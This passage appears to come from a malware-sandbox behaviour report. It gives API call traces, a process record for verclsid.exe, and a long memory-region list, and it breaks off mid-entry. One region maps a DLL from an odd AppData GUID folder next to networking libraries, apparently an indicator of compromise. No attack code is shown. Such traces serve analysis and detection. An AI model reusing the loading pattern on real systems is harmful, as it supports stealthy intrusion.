[0382.486] InitializeProcThreadAttributeList (in: lpAttributeList=0x308600, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x232d78 | out: lpAttributeList=0x308600, lpSize=0x232d78) returned 1
[0382.486] UpdateProcThreadAttribute (in: lpAttributeList=0x308600, dwFlags=0x0, Attribute=0x60001, lpValue=0x232d70, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x308600, lpPreviousValue=0x0) returned 1
[0382.486] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\verclsid.exe", lpCommandLine="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x232db0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x232d98 | out: lpCommandLine="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} ", lpProcessInformation=0x232d98*(hProcess=0x58, hThread=0x54, dwProcessId=0x424, dwThreadId=0x390)) returned 1
[0382.497] DeleteProcThreadAttributeList (in: lpAttributeList=0x308600 | out: lpAttributeList=0x308600)
[0382.497] GetProcessHeap () returned 0x2f0000
[0382.497] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308600 | out: hHeap=0x2f0000) returned 1
[0382.497] GetLastError () returned 0x7a
[0382.497] ResumeThread (hThread=0x54) returned 0x0
[0382.497] CloseHandle (hObject=0x54) returned 1
[0382.498] CloseHandle (hObject=0x58) returned 1
[0382.498] GetConsoleTitleW (in: lpConsoleTitle=0x24f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0382.498] exit (_Code=0)
Process:
id = "17"
image_name = "verclsid.exe"
filename = "c:\\windows\\system32\\verclsid.exe"
page_root = "0x729b8000"
os_pid = "0x424"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "16"
os_parent_pid = "0x194"
cmd_line = "verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2253
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2254
start_va = 0x150000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2255
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2256
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2257
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2258
start_va = 0xff340000
end_va = 0xff346fff
monitored = 0
entry_point = 0xff341b64
region_type = mapped_file
name = "verclsid.exe"
filename = "\\Windows\\System32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")
Region:
id = 2259
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2260
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2261
start_va = 0x7fffffdc000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2262
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2263
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2264
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2265
start_va = 0x1d0000
end_va = 0x2effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2266
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2267
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2268
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2269
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2270
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2271
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2272
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2273
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2274
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2275
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2276
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2277
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2278
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2279
start_va = 0x2f0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 2280
start_va = 0x3d0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 2281
start_va = 0x4d0000
end_va = 0x657fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004d0000"
filename = ""
Region:
id = 2282
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2283
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2284
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2285
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2286
start_va = 0x660000
end_va = 0x7e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 2287
start_va = 0x7f0000
end_va = 0x1beffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 2288
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2289
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2290
start_va = 0xd0000
end_va = 0x14cfff
monitored = 0
entry_point = 0xdcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2291
start_va = 0xd0000
end_va = 0x14cfff
monitored = 0
entry_point = 0xdcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2292
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2293
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2294
start_va = 0x2f0000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 2295
start_va = 0x3c0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 2296
start_va = 0x1bf0000
end_va = 0x1ccefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bf0000"
filename = ""
Region:
id = 2297
start_va = 0x7fefa140000
end_va = 0x7fefa196fff
monitored = 0
entry_point = 0x7fefa141118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 2298
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2299
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2300
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2301
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2302
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2303
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2304
start_va = 0xf0000
end_va = 0x132fff
monitored = 1
entry_point = 0x118ed0
region_type = mapped_file
name = "b79266.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")
Region:
id = 2305
start_va = 0x7fefb1b0000
end_va = 0x7fefb1c7fff
monitored = 0
entry_point = 0x7fefb1b1010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 2306
start_va = 0x7fef78f0000
end_va = 0x7fef78f8fff
monitored = 0
entry_point = 0x7fef78f1070
region_type = mapped_file
name = "wsock32.dll"
filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll")
Region:
id = 2307
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2308
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2309
start_va = 0x1cd0000
end_va = 0x1e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cd0000"
filename = ""
Region:
id = 2310
start_va = 0x1e70000
end_va = 0x1faffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e70000"
filename = ""
Region:
id = 2311
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2312
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2313
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 2314
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 2315
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2316
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2317
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2318
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2319
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2320
start_va = 0x7fef79b0000
end_va = 0x7fef79b6fff
monitored = 0
entry_point = 0x7fef79b11a0
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")
Region:
id = 2321
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 2322
start_va = 0x1fb0000
end_va = 0x227efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2323
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2324
start_va = 0x1cd0000
end_va = 0x1d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cd0000"
filename = ""
Region:
id = 2325
start_va = 0x1df0000
end_va = 0x1e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001df0000"
filename = ""
Region:
id = 2326
start_va = 0x2280000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 2327
start_va = 0x7fef9220000
end_va = 0x7fef9234fff
monitored = 0
entry_point = 0x7fef92212a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 2328
start_va = 0x1d40000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d40000"
filename = ""
Region:
id = 2329
start_va = 0x7fef9240000
end_va = 0x7fef9258fff
monitored = 0
entry_point = 0x7fef924177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 2330
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2331
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2332
start_va = 0x7fefcee0000
end_va = 0x7fefcf3afff
monitored = 0
entry_point = 0x7fefcee6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2333
start_va = 0x2280000
end_va = 0x232ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 2334
start_va = 0x2340000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002340000"
filename = ""
Region:
id = 2335
start_va = 0x7fef9210000
end_va = 0x7fef921afff
monitored = 0
entry_point = 0x7fef92112e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 2336
start_va = 0x2450000
end_va = 0x24cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002450000"
filename = ""
Region:
id = 2337
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2338
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2346
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2347
start_va = 0x1d0000
end_va = 0x1d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2348
start_va = 0x1f0000
end_va = 0x2effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2349
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2351
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2352
start_va = 0x2f0000
end_va = 0x2f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 2353
start_va = 0x310000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 2354
start_va = 0x7fef5740000
end_va = 0x7fef62f6fff
monitored = 0
entry_point = 0x7fef5741bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 2355
start_va = 0x77a50000
end_va = 0x77a56fff
monitored = 0
entry_point = 0x77a5106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 2356
start_va = 0x7fef56e0000
end_va = 0x7fef5733fff
monitored = 0
entry_point = 0x7fef56e104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 2357
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 2358
start_va = 0x300000
end_va = 0x301fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 2359
start_va = 0x2580000
end_va = 0x25fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 2360
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2361
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2362
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2363
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2364
start_va = 0x390000
end_va = 0x39cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2365
start_va = 0x2390000
end_va = 0x240ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 2366
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2367
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2368
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2369
start_va = 0x3a0000
end_va = 0x3a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 2370
start_va = 0x1cd0000
end_va = 0x1cf7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 2371
start_va = 0x3b0000
end_va = 0x3b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 2372
start_va = 0x2600000
end_va = 0x2700fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 2373
start_va = 0x2600000
end_va = 0x2700fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 2374
start_va = 0x2600000
end_va = 0x2700fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 2375
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2376
start_va = 0x3a0000
end_va = 0x3a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2377
start_va = 0x1d00000
